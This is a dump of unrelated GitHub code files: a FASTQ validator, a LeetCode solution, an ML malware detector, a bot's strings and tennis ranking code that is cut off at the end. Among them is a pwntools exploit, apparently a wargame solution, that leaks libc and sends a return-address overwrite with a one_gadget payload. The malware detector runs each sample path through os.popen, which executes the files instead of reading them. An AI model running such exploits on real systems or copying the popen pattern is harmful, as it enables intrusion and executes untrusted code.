/home/users/cordier/.linuxbrew/bin/python3\n\n#\n# Note: This Script Has Only Been Validated on FastQ\n#\n\ndef chunks (iterator, size):\n \"\"\"\n Split File into Chunks for Processing - Not Yet Implemented\n \"\"\"\n reads = True\n while reads:\n reads = []\n while len(chunk) < size:\n try:\n reads = iterator.next()\n except StopIteration:\n reads = None\n if reads is None:\n break\n chunk.append(reads)\n if chunk:\n yield chunk\n\nif __name__ == \"__main__\":\n\n # Imports\n import sys, argparse\n # Library Import\n from Bio import SeqIO\n from Bio.SeqIO.QualityIO import PairedFastaQualIterator\n\n # Accepted Formats\n acceptedFormats = [\"fasta\", \"fastq\", \"qual\", \"fa\", \"fq\", \"sam\"]\n\n # \n # Parse Arguments\n # \n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", type = str, help = \"Input File\")\n parser.add_argument(\"-p\", \"--prefix\", type = str, help = \"Output Prefix for Warnings CSV\")\n parser.add_argument(\"-f\", \"--format\", type = str, help = \"Format of Input File (overrides automatic detection)\")\n parser.add_argument(\"--paired\", action = \"store_true\", help = \"Interleaved Paired-End Reads File\")\n parser.add_argument(\"--strict\", action = \"store_true\", help = \"Evaluate complete file - i.e. don't output first error & exit\")\n parser.add_argument(\"--allow_orphan_reads\", action = \"store_true\", help = \"Allow For Orphan Reads\")\n argsDict = vars(parser.parse_args())\n\n # Set Arguments\n inputfile = argsDict[\"input\"]\n format = argsDict[\"format\"]\n prefix = argsDict[\"prefix\"]\n paired = argsDict[\"paired\"]\n strict = argsDict[\"strict\"]\n orphans = argsDict[\"allow_orphan_reads\"]\n\n # Detect Format\n if format is None:\n format = (inputfile.split(\".\")[-1]).lower()\n\n # Get Prefix\n if prefix is None:\n prefix = inputfile.replace(\".\" + format, \"\").split(\"/\")[-1]\n\n # Assertions for Required Input\n assert (inputfile is not None), \"No input file provided!\"\n assert (format in acceptedFormats), \"Invalid format: %s!\" % format\n\n #\n # Validation\n #\n\n if not strict:\n warnings = {\n \"unpaired_reads\" : [],\n \"qual_seq_len_mismatch\" : [],\n \"id_mismatch\" : {\n \"missing_1\" : [],\n \"missing_2\" : []\n }\n }\n if paired:\n\n # Not Strict, Paired, No Orphans\n print(\"\\nValidating That Sequences are Correctly Interleaved and That Sequence & Quality Scores Are of The Same Length\")\n with open(inputfile, \"r\") as handle:\n records = SeqIO.parse(handle, format)\n resetReadframe = False\n count = 0\n for record in records:\n seqA = record\n seqB = next(records)\n count += 2\n # Are Reads Paired-End?\n if (seqA.id[-2:] != \"/1\") and (seqA.id[-2:] != \"/2\"):\n warnings[\"unpaired_reads\"].append(seqA.id)\n if (seqB.id[-2:] != \"/1\") and (seqB.id[-2:] != \"/2\"):\n warnings[\"unpaired_reads\"].append(seqB.id)\n # Are Sequence Lengths & Quality Lengths the Same?\n if (len(seqA.seq) != len(seqA.letter_annotations[\"phred_quality\"])):\n warnings[\"qual_seq_len_mismatch\"].append(seqA.id)\n if (len(seqB.seq) != len(seqB.letter_annotations[\"phred_quality\"])):\n warnings[\"qual_seq_len_mismatch\"].append(seqB.id)\n # Are Paired IDs The Same?\n if seqA.id[0:-2] != seqB.id[0:-2]:\n # Is Read /1 In Fact the Read /1? If Not, 1 is in Fact 2 & Missing it's /1 Pair\n if (seqA.id[-2:] != \"/1\"):\n warnings[\"id_mismatch\"][\"missing_1\"].append(seqA.id)\n # Is Read /2 In Fact the Read /2? 
If Not, 2 is in Fact next 1, & 1 is Missing it's /2 Pair\n if (seqB.id[-2:] != \"/2\"):\n warnings[\"id_mismatch\"][\"missing_2\"].append(seqA.id)\n\n # Write Warnings\n with open(\"validation_warnings.%s.tsv\" % prefix, \"w\") as warningfile:\n warningfile.write(\"id\\twarning\\n\")\n for seqID in warnings[\"unpaired_reads\"]:\n warningfile.write(\"%s\\tunpaired_reads\\n\" % seqID)\n for seqID in warnings[\"qual_seq_len_mismatch\"]:\n warningfile.write(\"%s\\tqual_seq_len_mismatch\\n\" % seqID)\n for seqID in warnings[\"id_mismatch\"][\"missing_1\"]:\n warningfile.write(\"%s\\tid_mismatch_missing_1\\n\" % seqID)\n for seqID in warnings[\"id_mismatch\"][\"missing_2\"]:\n warningfile.write(\"%s\\tid_mismatch_missing_2\\n\" % seqID)\n\n # Print Results\n print(\"\\nParsed %d Paired End Reads and Found:\" % count)\n print(\" %d Unpaired Read(s)\" % len(warnings[\"unpaired_reads\"]))\n print(\" %d Read(s) Are Missing Their /1 Mate\" % len(warnings[\"id_mismatch\"][\"missing_1\"]))\n print(\" %d Read(s) Are Missing Their /2 Mate\" % len(warnings[\"id_mismatch\"][\"missing_2\"]))\n print(\" %d Read(s) With a Sequence / Quality String Length Mismatch\" % len(warnings[\"qual_seq_len_mismatch\"]))\n print(\"\\nWarnings Written to: validation_warnings.%s.tsv\" % prefix)\n\n else:\n\n # Not Strict, Single\n print(\"\\nValidating That Single-End Sequence & Quality Scores Are of The Same Length\")\n with open(inputfile, \"r\") as handle:\n records = SeqIO.parse(handle, format)\n count = 0\n for record in records:\n # Are Sequence Lengths & Quality Lengths the Same? (collect a warning instead of asserting, since this is the non-strict mode)\n if len(record.seq) != len(record.letter_annotations[\"phred_quality\"]):\n warnings[\"qual_seq_len_mismatch\"].append(record.id)\n count += 1\n\n # Write Warnings\n with open(\"validation_warnings.%s.tsv\" % prefix, \"w\") as warningfile:\n warningfile.write(\"id\\twarning\\n\")\n for seqID in warnings[\"qual_seq_len_mismatch\"]:\n warningfile.write(\"%s\\tqual_seq_len_mismatch\\n\" % seqID)\n \n # Print Results\n print(\"\\nParsed %d Single End Reads and Found:\" % count)\n print(\"\\t%d Read(s) With a Sequence / Quality String Length Mismatch\" % len(warnings[\"qual_seq_len_mismatch\"]))\n print(\"\\nWarnings Written to: validation_warnings.%s.tsv\" % prefix)\n\n else:\n \n # Strict, Paired, No Orphans\n if paired:\n\n print(\"\\nValidating That Sequences are Correctly Interleaved and That Sequence & Quality Scores Are of The Same Length\")\n if orphans:\n\n with open(inputfile, \"r\") as handle:\n records = SeqIO.parse(handle, format)\n for record in records:\n seqA = record\n seqB = next(records)\n # Are Reads Paired-End?\n assert (seqA.id[-2:] == \"/1\") or (seqA.id[-2:] == \"/2\"), \"Error: Sequence ID (%s) Does Not Indicate Paired Data\" % seqA.id\n assert (seqB.id[-2:] == \"/1\") or (seqB.id[-2:] == \"/2\"), \"Error: Sequence ID (%s) Does Not Indicate Paired Data\" % seqB.id\n # Are Sequence Lengths & Quality Lengths the Same?\n assert (len(seqA.seq) == len(seqA.letter_annotations[\"phred_quality\"])), \"Error: Sequence & Quality Lengths Do Not Match: (%s)\" % seqA.id\n assert (len(seqB.seq) == len(seqB.letter_annotations[\"phred_quality\"])), \"Error: Sequence & Quality Lengths Do Not Match: (%s)\" % seqB.id\n \n else:\n\n with open(inputfile, \"r\") as handle:\n records = SeqIO.parse(handle, format)\n for record in records:\n seqA = record\n seqB = next(records)\n # Are Reads Paired-End?\n assert (seqA.id[-2:] == \"/1\") or (seqA.id[-2:] == \"/2\"), \"Error: Sequence ID (%s) Does Not Indicate Paired Data\" % 
seqA.id\n assert (seqB.id[-2:] == \"/1\") or (seqB.id[-2:] == \"/2\"), \"Error: Sequence ID (%s) Does Not Indicate Paired Data\" % seqB.id\n # Are Paired IDs The Same?\n if seqA.id[0:-2] != seqB.id[0:-2]:\n # Is Read /1 In Fact the Read /1? If Not, 1 is in Fact 2 & Missing it's /1 Pair\n assert (seqA.id[-2:] == \"/1\"), \"Orphan Read Found (Missing /1 of Pair): %s\" % seqA.id\n # Is Read /2 In Fact the Read /2? If Not, 2 is in Fact next 1, & 1 is Missing it's /2 Pair\n assert (seqB.id[-2:] == \"/2\"), \"Orphan Read Found (Missing /2 of Pair): %s\" % seqA.id\n # Are Sequence Lengths & Quality Lengths the Same?\n assert (len(seqA.seq) == len(seqA.letter_annotations[\"phred_quality\"])), \"Error: Sequence & Quality Lengths Do Not Match: (%s)\" % seqA.id\n assert (len(seqB.seq) == len(seqB.letter_annotations[\"phred_quality\"])), \"Error: Sequence & Quality Lengths Do Not Match: (%s)\" % seqB.id\n \n else:\n\n # Strict, Single\n print(\"\\nValidating That Single-End Sequence & Quality Scores Are of The Same Length\")\n with open(inputfile, \"r\") as handle:\n records = SeqIO.parse(handle, format)\n for record in records:\n # Are Sequence Lengths & Quality Lengths the Same?\n assert (len(record.seq) == len(record.letter_annotations[\"phred_quality\"])), \"Error: Sequence & Quality Lengths Do Not Match: (%s)\" % record.id\n\n print(\"\\nDone\")\n\nelse:\n\n pass\n","repo_name":"greenstick/gatk-pipeliner","sub_path":"utils/validate-fastq.py","file_name":"validate-fastq.py","file_ext":"py","file_size_in_byte":10112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28322018167","text":"# Created by Bob at 2023/09/07 15:02\n# leetgo: dev\n# https://leetcode.com/problems/maximum-subarray/\n\nfrom typing import *\nfrom leetgo_py import *\n\n# @lc code=begin\n\n\nclass Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n maxSum = int(-10e4)\n prevSum = 0\n\n for num in nums:\n if prevSum + num > num:\n prevSum += num\n else:\n prevSum = num\n\n if prevSum > maxSum:\n maxSum = prevSum\n\n return maxSum\n\n\n# @lc code=end\n\nif __name__ == \"__main__\":\n nums: List[int] = deserialize(\"List[int]\", read_line())\n ans = Solution().maxSubArray(nums)\n\n print(\"\\noutput:\", serialize(ans))\n","repo_name":"princebillygk/dsa-and-leetcode","sub_path":"python3/0053.maximum-subarray/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30134644894","text":"import os\nimport sys\nimport pickle\nimport re\nimport numpy\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_extraction import FeatureHasher\n\nclass MachineLearningDetection():\n\n def __init__(self) -> None:\n self\n\n def get_string_features(self, path,hasher):\n # extract strings from binary file using regular expressions\n chars = r\" -~\"\n min_length = 5\n string_regexp = '[%s]{%d,}' % (chars, min_length)\n data = os.popen(f\"{path}\").read()\n #data = file_object.read()\n pattern = re.compile(string_regexp)\n strings = pattern.findall(data)\n string_features = {}\n for string in strings:\n string_features[string] = 1\n\n # hash the features using the hashing trick\n hashed_features = hasher.transform([string_features])\n\n # do some data munging to get the feature array\n hashed_features = hashed_features.todense()\n hashed_features = numpy.asarray(hashed_features)\n hashed_features = hashed_features[0]\n\n # return 
hashed string features\n print (\"Extracted {0} strings from {1}\".format(len(string_features),path))\n return hashed_features\n\n def scan_file(self, path):\n # scan a file to determine if it is malicious or benign\n if not os.path.exists(\"saved_detector.pkl\"):\n print (\"It appears you haven't trained a detector yet! Do this before scanning files.\")\n sys.exit(1)\n with open(\"saved_detector.pkl\", \"rb\") as saved_detector:\n classifier, hasher = pickle.load(saved_detector)\n features = self.get_string_features(path,hasher)\n result_proba = classifier.predict_proba([features])[:,1]\n # if the user specifies malware_paths and benignware_paths, train a detector\n if result_proba > 0.5:\n print (f\"It appears this file is malicious!{result_proba}\")\n else:\n print (f\"It appears this file is benign{result_proba}\")\n\n def train_detector(self, benign_path,malicious_path,hasher):\n # train the detector on the specified training data\n def get_training_paths(directory):\n targets = []\n for path in os.listdir(directory):\n targets.append(os.path.join(directory,path))\n return targets\n malicious_paths = get_training_paths(malicious_path)\n benign_paths = get_training_paths(benign_path)\n X = [self.get_string_features(path,hasher) for path in malicious_paths + benign_paths]\n y = [1 for i in range(len(malicious_paths))] + [0 for i in range(len(benign_paths))]\n classifier = RandomForestClassifier(64)\n classifier.fit(X,y)\n pickle.dump((classifier,hasher),open(\"saved_detector.pkl\",\"wb\"))\n\n def cv_evaluate(self, X,y,hasher):\n # use cross-validation to evaluate our model\n import random\n from sklearn import metrics\n from matplotlib import pyplot\n from sklearn.model_selection import KFold\n X, y = numpy.array(X), numpy.array(y)\n fold_counter = 0\n for train, test in KFold(n_splits=2, shuffle=True).split(X):\n training_X, training_y = X[train], y[train]\n test_X, test_y = X[test], y[test]\n classifier = RandomForestClassifier(64)\n classifier.fit(training_X,training_y)\n scores = classifier.predict_proba(test_X)[:,-1]\n fpr, tpr, thresholds = metrics.roc_curve(test_y, scores)\n #pyplot.semilogx(fpr,tpr,label=\"Fold number {0}\".format(fold_counter))\n pyplot.semilogx(fpr,tpr,label=\"ROC curve\")\n fold_counter += 1\n break\n pyplot.xlabel(\"detector false positive rate\")\n pyplot.ylabel(\"detector true positive rate\")\n pyplot.title(\"Detector ROC curve\")\n #pyplot.title(\"detector cross-validation ROC curves\")\n pyplot.legend()\n pyplot.grid()\n pyplot.show()\n\n def get_training_data(self, benign_path,malicious_path,hasher):\n def get_training_paths(directory):\n targets = []\n for path in os.listdir(directory):\n targets.append(os.path.join(directory,path))\n return targets\n malicious_paths = get_training_paths(malicious_path)\n benign_paths = get_training_paths(benign_path)\n X = [self.get_string_features(path,hasher) for path in malicious_paths + benign_paths]\n y = [1 for i in range(len(malicious_paths))] + [0 for i in range(len(benign_paths))]\n return X, y\n","repo_name":"aleyhdar/-BSM497","sub_path":"ch7/machine_learning_detection.py","file_name":"machine_learning_detection.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73819469532","text":"def createFile(name):\n try:\n with open(name, 'w', encoding='utf-8') as f:\n f.write('123')\n except FileNotFoundError as e:\n print(e)\n print(e.args)\n print(e.errno)\n name = name.replace('/', '')\n with open(name, 'w', 
encoding='utf-8') as f:\n f.write('123')\n except OSError as e:\n print(e)\n name = 'test123'\n with open(name, 'w', encoding='utf-8') as f:\n f.write('123')\n except:\n print('Unknown Exception!')\n\ncreateFile('test/test1.txt')\ncreateFile('test?test')","repo_name":"uuboyscy/eb102-python","sub_path":"13_exception1.py","file_name":"13_exception1.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3491429785","text":"from pwn import *\n\n# p = process(\"./oneshot\")\n# nc host1.dreamhack.games 23506\np = remote(\"host1.dreamhack.games\", 23506)\n\nlibc = ELF(\"./libc.so.6\")\n# libc = ELF(\"/lib/x86_64-linux-gnu/libc-2.23.so\")\n\n# one_offset = [0x45226, 0x4527a, 0xf03a4, 0xf1247] # /lib/x86_64-linux-gnu/libc-2.23.so\none_offset = [0x45216, 0x4526a, 0xf02a4, 0xf1147]\n\n# pie_base = p.libs()['/home/leeminjea/Desktop/sf/dreamhack/oneshot/oneshot']\n\np.recvuntil(\"stdout: \")\n\nstdout = int(p.recv(14), 16)\nlibc.address = stdout - libc.symbols[\"_IO_2_1_stdout_\"] #+ pie_base\none_gadget = libc.address + one_offset[0]\n\nlog.info(\"stdout: \" + hex(stdout))\nlog.info(\"libc.address: \" + hex(libc.address))\n\npay = b\"\"\npay += b\"A\" * (0x20 - 0x8)\npay += p64(0)\npay += b\"B\" * 0x8\npay += p64(one_gadget)\n# pay += b\"X\" * 0x8\n\ninput()\n\np.sendafter(\"MSG: \", pay)\n\n\np.interactive()","repo_name":"MinjeaLee/s-_pwn_sf","sub_path":"dreamhack/oneshot/ex_oneshot.py","file_name":"ex_oneshot.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"14578391215","text":"from aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\n\nwelcome_text = \"Привет! Я - простой бот, чтобы узнать погоду сейчас или прогноз погоды.\\n\" \\\n \"Для этого используйте команду /weather.\\n\" \\\n \"<>\\n\" \\\n \"Hello! 
I am a simple bot to get weather forecast or current weather.\\n\" \\\n \"To get weather forecast or find out current weather in your location, use the /weather command.\"\nunfinished_registration = \"Пожалуйста, выберите язык\\n\" \\\n \"<>\\n\" \\\n \"Please, set language\"\n\nlang_kb = InlineKeyboardMarkup()\nlang_kb.add(InlineKeyboardButton(\"Русский\", callback_data=\"ru\"))\nlang_kb.add(InlineKeyboardButton(\"English\", callback_data=\"en\"))\n","repo_name":"Dannypa/WeatherBot","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41447450836","text":"def main():\n print(\"Rankings module\")\n\nfrom datetime import timedelta\nimport numpy as np\n\n# Winners win ranking functions:\ndef get_winners_win_dict(matches, year = None):\n \"\"\"\n Assumes matches is a list of dictionaries, where each dictionary is a match.\n Assumes these matches come ordered by date.\n Assumes year is an integer that defaults to None, it specifies whether\n the number of matches won should be computed throughout the whole dataset\n or for a particular year.\n \"\"\"\n winners_dict = {}\n for match in matches:\n # Check for specific years.\n if year != None:\n # Assumes matches are chronologically ordered.\n # Matches before our year are skipped\n if match[\"start_date\"].date().year < year:\n continue\n # We break the loop after we have finished with the matches of a year.\n elif match[\"start_date\"].date().year > year:\n break\n\n # And now we include the victories of the players.\n if match[\"player_1\"] not in winners_dict:\n winners_dict[match[\"player_1\"]] = 0\n if match[\"player_2\"] not in winners_dict:\n winners_dict[match[\"player_2\"]] = 0\n if match[\"player_1\"] == match[\"winner\"]:\n winners_dict[match[\"player_1\"]] += 1\n else:\n winners_dict[match[\"player_2\"]] += 1\n\n return winners_dict\n\ndef winners_win_ranking(matches, year = None):\n \"\"\"\n Assumes matches is a list of dictionaries, where each dictionary is a match.\n Assumes year is an integer that defaults to None, it specifies whether\n the number of matches won should be computed throughout the whole dataset\n or for a particular year.\n Returns a list of lists [[player, number of matches won, ranking]]\n ordered by ranking (which is defined as the reverse of matches won, compared\n between players).\n \"\"\"\n if year != None:\n if year < 2007 or year > 2021:\n raise ValueError(\"There is no data availability before 2007 or after 2021.\")\n\n ranking = 0\n winners_list = []\n winners_dict = get_winners_win_dict(matches, year)\n # Source for using winners_dict.get:\n # https://stackoverflow.com/a/3177911/15459665\n for winner in sorted(winners_dict, key = winners_dict.get, reverse = True):\n ranking += 1\n winners_list.append([winner, winners_dict[winner], ranking])\n\n return winners_list\n\n\n\n# Winners don\"t lose ranking functions:\ndef get_dict_tournaments_rounds(matches):\n \"\"\"\n Assumes matches is a list of dictionaries, where each dictionary is a match.\n Returns a dictionary of dictionaries, where we can retrieve the round number\n of a round in a certain tournament.\n\n E.g., {\"US Open\":{2007: {\"First Round\": 1, ..., \"Final\": 5},\n 2008: {\"Third Round\": 3, \"Fourth Round\": 4, ..., \"Final\": 6]}}\n \"\"\"\n tournaments_dict = {}\n n_round = 0\n for match in matches:\n if match[\"tournament\"] in tournaments_dict:\n if match[\"start_date\"] in 
tournaments_dict[match[\"tournament\"]]:\n if match[\"round\"] in \\\n tournaments_dict[match[\"tournament\"]][match[\"start_date\"]]:\n continue\n\n # Tournament in dictionary, but in a different year.\n else:\n tournaments_dict[match[\"tournament\"]][match[\"start_date\"]] = {}\n n_round = 0\n\n # New tournament in the dataset. In both cases (new year and new tournament)\n # we reset n_round.\n elif match[\"tournament\"] not in tournaments_dict:\n tournaments_dict[match[\"tournament\"]] = {}\n tournaments_dict[match[\"tournament\"]][match[\"start_date\"]] = {}\n n_round = 0\n\n\n # Handle the case of splitted tournaments in the following if-statements:\n if n_round == 0 and match[\"round\"] == \"Second Round\":\n n_round += 2\n\n # Set the final at the same level of the Third Place match if there is one.\n # (Here we are assuming that the matches are chronologically ordered)\n elif (match[\"round\"] == \"Final\"\n and \"Third Place\" in tournaments_dict[match[\"tournament\"]][match[\"start_date\"]]):\n n_round = tournaments_dict[match[\"tournament\"]][match[\"start_date\"]][\"Third Place\"]\n\n # In any other circumstance, the number of rounds increases by one.\n else:\n n_round += 1\n\n\n tournaments_dict[match[\"tournament\"]][match[\"start_date\"]][match[\"round\"]] = n_round\n\n return tournaments_dict\n\ndef get_winners_dont_lose_dict(matches, year = None):\n \"\"\"\n Assumes matches is a list of dictionaries, where each dictionary is a match.\n Assumes year is an integer that defaults to None, it specifies whether\n the number of matches won should be computed throughout the whole dataset\n or for a particular year.\n \"\"\"\n winners_dict = {}\n tournaments_dict = get_dict_tournaments_rounds(matches)\n for match in matches:\n # Same procedure as in get_winners_win_dict to check for the desired year\n if year != None:\n if match[\"start_date\"].date().year < year:\n continue\n elif match[\"start_date\"].date().year > year:\n break\n\n # Initialize the player in the dict\n if match[\"player_1\"] not in winners_dict:\n winners_dict[match[\"player_1\"]] = 0\n if match[\"player_2\"] not in winners_dict:\n winners_dict[match[\"player_2\"]] = 0\n\n # Retrieve the match round.\n r = tournaments_dict[match[\"tournament\"]][match[\"start_date\"]][match[\"round\"]]\n\n # Add or substract points depending on r\n if match[\"player_1\"] == match[\"winner\"]:\n winners_dict[match[\"player_1\"]] += 1 * r\n winners_dict[match[\"player_2\"]] -= 1 / r\n else:\n winners_dict[match[\"player_1\"]] -= 1 / r\n winners_dict[match[\"player_2\"]] += 1 * r\n\n return winners_dict\n\ndef winners_dont_lose_ranking(matches, year = None):\n \"\"\"\n Assumes matches is a list of dictionaries, where each dictionary is a match.\n Assumes year is an integer that defaults to None, it specifies whether\n the number of matches won should be computed throughout the whole dataset\n or for a particular year.\n Returns a list of lists (player, score and ranking)\n ordered by ranking (which is defined as the reverse of score, compared\n between players). 
The objective of using a list is to preserve order.\n \"\"\"\n if year != None:\n if year < 2007 or year > 2021:\n raise ValueError(\"There is no data availability before 2007 or after 2021.\")\n\n ranking = 0\n winners_list = []\n winners_dict = get_winners_dont_lose_dict(matches, year)\n for winner in sorted(winners_dict, key = winners_dict.get, reverse = True):\n ranking += 1\n winners_list.append([winner, winners_dict[winner], ranking])\n\n return winners_list\n\n\n# Winners beat other winners rankings\ndef get_wbw_dict(matches, year = None, weeks = None, start_date = None):\n \"\"\"\n Assumes matches is a list of dictionaries, where each dictionary represents\n a match (ordered by date). Assumes year is an integer that shows the year in which the dictionary\n should be calculated; if set to None, it gathers information for all the years.\n Weeks (integer) and start date (datetime) are used to calculate the rankings for\n all matches ended in the previous n weeks to a certain date.\n Year should not be used together with weeks and start_date.\n\n This function returns a dictionary of players, showing the number of times\n they lost \"n_losses\" and a dictionary called \"lost_to\" that represents\n the players to whom they lost and how many times this happened.\n \"\"\"\n if start_date != None and weeks != None and year != None:\n raise ValueError(\"Year parameter cannot be specified together with weeks and start_date.\")\n if weeks != None and weeks <= 0:\n raise ValueError(\"The number of previous weeks to take into account must be positive.\")\n losers_dict = {}\n if start_date != None and weeks != None:\n first_week = start_date - timedelta(weeks = weeks)\n for match in matches:\n # We use the years procedure to trim the matches.\n # Same counting as in get_winners_win_dict\n if weeks == None and start_date == None:\n if year != None:\n if match[\"start_date\"].date().year < year:\n continue\n elif match[\"start_date\"].date().year > year:\n break\n\n # Or the weeks procedure:\n # Since tournaments and matches are ordered,\n # it breaks the loop after surpassing the inputted\n # start date (in other words, includes tournaments ENDED\n # in the interval of the 52 weeks previous to the current start date).\n else:\n if match[\"end_date\"] < first_week:\n continue\n elif match[\"end_date\"] > start_date:\n break\n\n # If the players do not appear in the dictionary yet, we include them.\n if match[\"player_1\"] not in losers_dict:\n losers_dict[match[\"player_1\"]] = {}\n losers_dict[match[\"player_1\"]][\"n_losses\"] = 0\n losers_dict[match[\"player_1\"]][\"lost_to\"] = {}\n if match[\"player_2\"] not in losers_dict:\n losers_dict[match[\"player_2\"]] = {}\n losers_dict[match[\"player_2\"]][\"n_losses\"] = 0\n losers_dict[match[\"player_2\"]][\"lost_to\"] = {}\n\n # The loser adds one loss, and we create a dictionary with the players to\n # whom she has lost and the number of times this has happened.\n if match[\"player_1\"] != match[\"winner\"]:\n losers_dict[match[\"player_1\"]][\"n_losses\"] += 1\n if match[\"player_2\"] not in losers_dict[match[\"player_1\"]][\"lost_to\"]:\n losers_dict[match[\"player_1\"]][\"lost_to\"][match[\"player_2\"]] = 1\n else:\n losers_dict[match[\"player_1\"]][\"lost_to\"][match[\"player_2\"]] += 1\n else:\n losers_dict[match[\"player_2\"]][\"n_losses\"] += 1\n if match[\"player_1\"] not in losers_dict[match[\"player_2\"]][\"lost_to\"]:\n losers_dict[match[\"player_2\"]][\"lost_to\"][match[\"player_1\"]] = 1\n else:\n 
losers_dict[match[\"player_2\"]][\"lost_to\"][match[\"player_1\"]] += 1\n\n return losers_dict\n\n\ndef wbw_ranking(matches, year = None, weeks = None, start_date = None,\n epsilon = 1e-10, max_iterations = 150):\n \"\"\"\n Assumes matches is a list of dictionaries, where each dictionary is a match.\n Year is an integer that shows the year for which the ranking should be calculated.\n Weeks (integer) and start date (datetime) are used to calculate the rankings for\n all matches ended in the previous n weeks to a certain date.\n Year should not be used together with weeks and start_date.\n\n Epsilon is a float used to determine the convergence criterion of the scores\n in the last algorithm. It shows the average deviation from the scores of each player\n between the previous iteration of the wbw score distribution and the current one.\n Hence, if the algorithm takes too much time or does not converge, the user can raise it.\n On the other hand, max_iterations shows the number of maximum iterations that\n the algorithm should run; it works as a stopping rule in case there is no\n convergence.\n\n This algorithm implements the WbW (winners beat other winners) ranking.\n It returns two objects:\n The first one is a list of lists (player, score and ranking)\n ordered by ranking (which is defined as the reverse of score, compared\n between players). The objective of using a list is to preserve order.\n The second one is a dictionary of the players, where the values are a list of\n score-ranking pairs. This is a more efficient data structure for comparison\n purposes, whereas the first one is better suited for easily finding the top n players.\n \"\"\"\n if weeks == None or start_date == None:\n losers_dict = get_wbw_dict(matches, year = year)\n else:\n losers_dict = get_wbw_dict(matches, weeks = weeks, start_date = start_date)\n n_players = len(losers_dict)\n init_score = 1 / n_players\n\n # Now we add the initial score of the players, calculate the share of each,\n # and distribute their shares to the players to whom they have lost.\n for loser in losers_dict:\n if \"score\" not in losers_dict[loser]:\n losers_dict[loser][\"score\"] = 0\n\n try:\n losers_dict[loser][\"share\"] = (init_score /\n losers_dict[loser][\"n_losses\"])\n\n # If n_losses = 0, we handle the DivisionZeroError to avoid a function crash.\n except ZeroDivisionError:\n losers_dict[loser][\"score\"] += init_score\n\n # Players who lost at least once give the corresponding shares to other players:\n if losers_dict[loser][\"n_losses\"] != 0:\n # For each player who beat her\n for player in losers_dict[loser][\"lost_to\"]:\n if \"score\" not in losers_dict[player]:\n losers_dict[player][\"score\"] = 0\n # The player adds the loser\"s share * times the loser lost to the player\n losers_dict[player][\"score\"] += (losers_dict[loser][\"share\"] *\n losers_dict[loser][\"lost_to\"][player])\n\n # Finally, we rescale the score.\n for loser in losers_dict:\n losers_dict[loser][\"score\"] = ((losers_dict[loser][\"score\"] * 0.85) +\n (0.15 / n_players))\n\n # We repeat the previous procedure until there is minimum variation among the\n # scores of the players or a maximum level of iterations is reached.\n sd = np.inf\n n_iterations = 1\n while sd > epsilon and n_iterations < max_iterations:\n for loser in losers_dict:\n if \"new_score\" not in losers_dict[loser]:\n losers_dict[loser][\"new_score\"] = 0\n\n try:\n losers_dict[loser][\"share\"] = (losers_dict[loser][\"score\"] /\n losers_dict[loser][\"n_losses\"])\n except 
ZeroDivisionError:\n losers_dict[loser][\"new_score\"] += losers_dict[loser][\"score\"]\n\n # Players who lost at least once give the corresponding shares to other players:\n if losers_dict[loser][\"n_losses\"] != 0:\n for player in losers_dict[loser][\"lost_to\"]:\n if \"new_score\" not in losers_dict[player]:\n losers_dict[player][\"new_score\"] = 0\n losers_dict[player][\"new_score\"] += (losers_dict[loser][\"share\"] *\n losers_dict[loser][\"lost_to\"][player])\n\n # Finally, we rescale the score.\n # Here we calculate the standard deviation between\n # the previous and the current scores.\n sum_squared_differences_between_scores = 0\n ranking_dict = {}\n for loser in losers_dict:\n losers_dict[loser][\"new_score\"] = ((losers_dict[loser][\"new_score\"] * 0.85) +\n (0.15 / n_players))\n\n sum_squared_differences_between_scores += ((losers_dict[loser][\"new_score\"] -\n losers_dict[loser][\"score\"]) ** 2)\n\n # We fix the previous score for the following iteration.\n losers_dict[loser][\"score\"] = losers_dict[loser][\"new_score\"]\n losers_dict[loser][\"new_score\"] = 0\n\n # We populate the ranking_dict that we will use later for ordering in\n # case tihs is the last iteration. The value of each key is a list,\n # the second element will be the ranking position.\n ranking_dict[loser] = [losers_dict[loser][\"score\"]]\n\n sd = (sum_squared_differences_between_scores / n_players) ** (1 / 2)\n n_iterations += 1\n\n\n # We create a list for the printing procedure, and a dictionary if we want\n # to use it for comparing rankings. (It has a higher space complexity if we create both,\n # but a lower time complexity for future tasks).\n ranking = 0\n ranking_list = []\n for loser in sorted(ranking_dict, key = ranking_dict.get, reverse = True):\n ranking += 1\n ranking_list.append([loser, ranking_dict[loser][0], ranking])\n ranking_dict[loser].append(ranking)\n\n return ranking_list, ranking_dict\n\n\ndef print_top_n_ranking(matches, ranking_function, top_n_players, year = None,\n epsilon = 1e-10, max_iterations = 150):\n \"\"\"\n Assumes matches is a list of dictionaries where each match is a dictionary.\n Assumes n_players is an integer with the number of top players (from the beginning),\n according to the winners win ranking of a certain year, to print.\n Ranking_function can take three values:\n \"winners_win_ranking\", \"winners_dont_lose_ranking\" and \"wbw_ranking\".\n Epsilon and max_iterations are arguments predefined for the wbw_ranking function,\n lower epsilon and higher max_iterations are stronger criteria for convergence.\n For further details, please refer to the docstring of the wbw_ranking function.\n Prints the top n_players\n \"\"\"\n if ranking_function not in [winners_win_ranking,\n winners_dont_lose_ranking,\n wbw_ranking]:\n raise TypeError(\"A ranking function as specified in the docstring should be inputted.\")\n\n elif ranking_function == winners_win_ranking:\n for winner in ranking_function(matches, year)[:top_n_players]:\n if year != None:\n print(\"According to the winners win ranking,\",\n winner[0], \"was the player ranked\", winner[2],\n \"in\", year, \"with\", winner[1], \"games won.\")\n else:\n print(\"According to the winners win ranking,\",\n winner[0], \"was the player ranked\", winner[2],\n 